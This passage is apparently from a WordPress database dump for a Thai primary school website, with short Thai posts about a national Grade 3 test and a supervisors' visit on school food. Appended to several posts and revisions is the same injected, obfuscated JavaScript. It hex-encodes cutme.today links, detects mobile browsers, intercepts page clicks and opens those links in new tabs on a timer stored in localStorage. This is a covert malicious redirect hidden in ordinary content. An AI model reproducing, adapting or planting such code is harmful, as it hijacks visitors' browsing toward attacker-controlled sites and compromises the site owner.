\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','วารสารประชาสัมพันธ์','','publish','closed','closed','','%e0%b8%a7%e0%b8%b2%e0%b8%a3%e0%b8%aa%e0%b8%b2%e0%b8%a3%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c-19','','','2024-08-01 20:35:04','2024-08-01 13:35:04','',0,'http://pakhaeng.ssk.in.th/?p=389',0,'post','',0),
(390,1,'2024-08-01 20:34:46','2024-08-01 13:34:46','','7-67','','inherit','','closed','','7-67','','','2024-08-01 20:34:46','2024-08-01 13:34:46','',389,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/7-67.png',0,'attachment','image/png',0),
(391,1,'2024-08-01 20:35:01','2024-08-01 13:35:01','<!-- wp:paragraph -->\n<p><strong> วันที่ 28 กุมภาพันธ์ 2567 โรงเรียนบ้านหนองปลาเข็ง กอไหล่ นำโดยท่านผู้อำนวยการเสน่หา พลโสภา และคณะครู ได้ดำเนินการทดสอบความสามาถพื้นฐานของผู้เรียนระดับชาติ เป็นการทดสอบเพื่อวัดความรู้ และความคิดรวบยอดของนักเรียนชั้นประถมศึกษาปีที่ 3</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:image {\"id\":390,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/7-67-724x1024.png\" alt=\"\" class=\"wp-image-390\"/></figure>\n<!-- /wp:image -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','วารสารประชาสัมพันธ์','','inherit','closed','closed','','389-revision-v1','','','2024-08-01 20:35:01','2024-08-01 13:35:01','',389,'http://pakhaeng.ssk.in.th/?p=391',0,'revision','',0),
(392,1,'2024-08-01 20:36:00','2024-08-01 13:36:00','<!-- wp:paragraph -->\n<p><strong></strong><strong> </strong><strong></strong><strong>วันที่ 28 กุมภาพันธ์ 2567 โรงเรียนบ้านหนองปลาเข็ง กอไหล่ นำโดยท่านผู้อำนวยการ</strong><strong>เสน่หา</strong><strong> </strong><strong>พลโสภา และคณะครู</strong><strong> </strong><strong></strong><strong>ได้ต้อนรับคณะนิเทศ กำ กับติดตาม ตามการกำกับ ติดตาม โครงการสร้างมูลค่าเพิ่มผลผลิตกับชุมชน และภาคีเครือข่าย</strong><strong></strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p><strong>เพื่ออาหารนักเรียนในโรงเรียน</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:image {\"id\":393,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/8-67-724x1024.png\" alt=\"\" class=\"wp-image-393\"/></figure>\n<!-- /wp:image -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v 